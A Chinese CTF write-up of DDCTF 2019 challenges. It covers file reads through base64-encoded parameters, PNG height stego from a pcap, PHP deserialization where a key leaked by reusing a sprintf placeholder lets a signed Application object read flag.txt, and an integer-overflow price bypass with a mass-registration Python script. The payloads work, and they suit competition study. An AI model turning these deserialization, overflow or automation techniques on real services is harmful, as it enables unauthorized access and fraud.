DDCTF 2019 部分 writeup

只做出一道web,一道misc,好菜。接下来看大佬的wp学习下吧。

web1

打开链接,可以看到可能存在文件包含的url,有base64编码的参数,,经2次base64解密加转字符串为flag.php。
审查元素,可以看到图片的base64编码。


图片.png

接下来将index.php先转16进制然后经2次base64编码,提交,将返回的base64解码得到index.php源代码。


图片.png

可以知道,我们传进去的jpg参数成为文件名然后被读取。接下来就是找到flag文件名了。
然后脑洞大开,我们可以看到源代码上面有个博客,还有个日期,我们访问,并且找到对应日期的那篇,里面提到了一个文件practice.txt.swp,访问它,得到一个文件名。然后按照刚才的操作传递给jpg,这里的!用config代替。
图片.png

将返回的base64解码得到f1ag!ddctf.php的源代码。


图片.png

其中extract($_GET);是将你get提交的参数进行赋值。利用php伪协议绕过。
图片.png

Wireshark

用wireshark打开,导出所有http,可以看到有一个img_add_info是在线图片加解密的网站,并且,还有两个图片文件。
打开网站可以看到可以上传解密图片,并且还需要密码。


图片.png

去掉开头的无用内容。


图片.png

保存为png,可以看到有两个图片。有一个带有钥匙,并且明显宽高比例差距很大,因此修改下高的大小。我们先看图片信息,为1600x544,我们将它改为1600x1600。用winhex打开。将0220改为0640。(544对应的十六进制为0220,1600对应0640)
图片.png

然后保存图片可以得到key
图片.png

在开始的网站解密另一张图片,得到十六进制字符串,转码得到flag。DDCTF{NbuiBUlR5lhww2OfpEmueZd64OlRJ1D2}

web签到题

打开页面提示,权限不够。抓包,可以看到有个didictf_username参数为空,改为admin,访问,得到返回/app/fL2XID2i0Cdh.php。访问得到源代码。接下来代码审计。

Application.php里有一个Application类,auth函数就是检测didictf_username是否为admin。重点是__destruct函数,用过构造path,利用它可以读取我们想要的文件。path要满足长度为18,并且将../替换为空,用双写绕过即可。

Session.php代码很长,看重点部分。

 $hash = substr($session,strlen($session)-32);
        $session = substr($session,0,strlen($session)-32);

        if($hash !== md5($this->eancrykey.$session)) {
            parent::response("the cookie data not match",'error');
            return FALSE;
        }
        $session = unserialize($session);

对session了进行反序列化,这里就是要利用反序列化创建Application,然后读取文件。
所以思路就是传入构造的session,通过session反序列化,创建Application对象,利用destruct函数读取文件。
但是他对session做了签名,判断传入的session最后32位是否等于md5(eancrykey.$session),所以就要知道eancrykey的值。当时做题的时候就卡在这里。看到有个注释 说key建议为8位字符串,还想去爆破。。。

接下来看eancrykey出现的位置,有两处。

 private function get_key() {
        //eancrykey  and flag under the folder
        $this->eancrykey =  file_get_contents('../config/key.txt');
    }

 if(!empty($_POST["nickname"])) {
            $arr = array($_POST["nickname"],$this->eancrykey);
            $data = "Welcome my friend %s";
            foreach ($arr as $k => $v) {
                $data = sprintf($data,$v);
            }
            parent::response($data,"Welcome");
        }

上面那个不可能,重点关注下面那个。我们随便提交个nickname,可以看到。


0.png

当我们传入的nickname为hello的时候,第一次赋值后,data将变为Welcome my friend hello。后面的eancrykey,已经没有占位符了。
所以传入nickname为%s,第一次赋值后,data还是Welcome my friend hello %s,第二次辅助就会将eancrykey返回。得到为EzblrbNS。
接下来就好办了,构造path为..././config/flag.txt(注释提示了flag和key同一个文件)。将其序列化。


图片.png
//序列化
O:11:"Application":1:{s:4:"path";s:21:"..././config/flag.txt";}
//加上MD5签名
O:11:"Application":1:{s:4:"path";s:21:"..././config/flag.txt";}5a014dbe49334e6dbb7326046950bee2
//url编码
O%3A11%3A%22Application%22%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A21%3A%22...%2F.%2Fconfig%2Fflag.txt%22%3B%7D5a014dbe49334e6dbb7326046950bee2

提交得到flag。


图片.png

大吉大利,今晚吃鸡~

按流程走一遍,注册账号,然后购买券。支付,但是支付的时候需要2000,余额只有100。因此在购买的时候抓包,修改price,但是测试发现只能修改成比2000大,想到可能是溢出。用这个插件可以看到是go语言写的。


图片.png

搜一下go语言的数据类型,一个一个试。当price为4294967295是返回500,出现异常。提交price为4294967296。


图片.png

可以看到支付成功,并返回了一个id和ticket,通过id和ticket可以移除对手,接下来就是从哪去找。
又重新注册个账号,买券,得到id和ticket。然后在刚才那个账号中去移除,可以发现移除成功,剩余人数99人。接下来编写脚本,注册账号,买票,支付,得到id和ticket,然后用第一次那个账号移除它
图片.png
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import time

url_register = "http://117.51.147.155:5050/ctf/api/register?name={}&password={}"
url_buy = "http://117.51.147.155:5050/ctf/api/buy_ticket?ticket_price=4294967296"
url_pay = "http://117.51.147.155:5050//ctf/api/pay_ticket?bill_id={}"
url_remove = "http://117.51.147.155:5050/ctf/api/remove_robot?id={}&ticket={}"

headers = {
    "Cookie": "user_name=gelinlang; REVEL_SESSION=2f73da6d52afd64e0641fcc79e0b781e"
}

for i in range(1, 777):
    res = requests.session()
    user = res.get(url_register.format("gelinlang"+str(i), 12345678))
    buy = res.get(url_buy)
    #print(buy.json())
    id = buy.json()["data"][0]["bill_id"]
    #print(id)
    pay = res.get(url_pay.format(id))
    id = pay.json()['data'][0]["your_id"]
    ticket = pay.json()["data"][0]["your_ticket"]
    #print(id, ticket)
    gelinlang = requests.get(url_remove.format(id, ticket), headers=headers)
    print(gelinlang.text)
    time.sleep(0.5)

一直跑直到最后最后吃鸡,得到flag。


图片.png
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 217,734评论 6 505
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,931评论 3 394
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 164,133评论 0 354
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,532评论 1 293
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,585评论 6 392
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,462评论 1 302
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,262评论 3 418
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,153评论 0 276
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,587评论 1 314
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,792评论 3 336
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,919评论 1 348
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,635评论 5 345
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,237评论 3 329
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,855评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,983评论 1 269
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 48,048评论 3 370
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,864评论 2 354